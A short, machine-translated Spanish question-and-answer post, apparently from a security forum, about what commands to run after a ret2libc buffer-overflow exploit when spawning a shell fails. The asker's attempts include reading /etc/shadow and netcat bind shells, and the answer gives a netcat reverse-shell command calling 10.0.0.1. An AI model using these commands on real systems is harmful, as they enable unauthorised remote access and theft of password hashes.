¿Qué debe hacer si no puede generar un shell en un ataque de desbordamiento de búfer?

2

He explotado exitosamente un programa usando ret2libc pero estoy teniendo un problema. Siempre que alimente system() con /bin/sh no tengo nada a cambio, el programa sale silenciosamente.

Sin embargo, si alimento echo val > /t y leo /t , obtengo val .

¿Entonces puedo ejecutar comandos parciales y quiero saber qué comandos se pueden usar en lugar de generar un shell?

Pensé en:

nc -l -p 99 #but I get illegal arg -p
cat /etc/shadow #but I get sh: 1: tc/shadow: not found

Me gustaría saber qué otras posibilidades puedo ejecutar que me darían acceso al servidor / computadora vulnerables teniendo en cuenta que el shell inverso ( nc -l -p -e /bin/sh ) no funcionó debido a algún tipo de limitación de cadena.

    
pregunta AK_ 12.05.2014 - 09:08
fuente

1 respuesta

1

Una cáscara inversa debería hacerlo. Tienes varias opciones. Lea un poco más sobre esto aquí.

enlace

Con netcat creo que podría hacerse de la siguiente manera

nc -e /bin/sh 10.0.0.1 1234
    
respondido por el Anton Garcia Dosil 12.05.2014 - 12:34
fuente

Lea otras preguntas en las etiquetas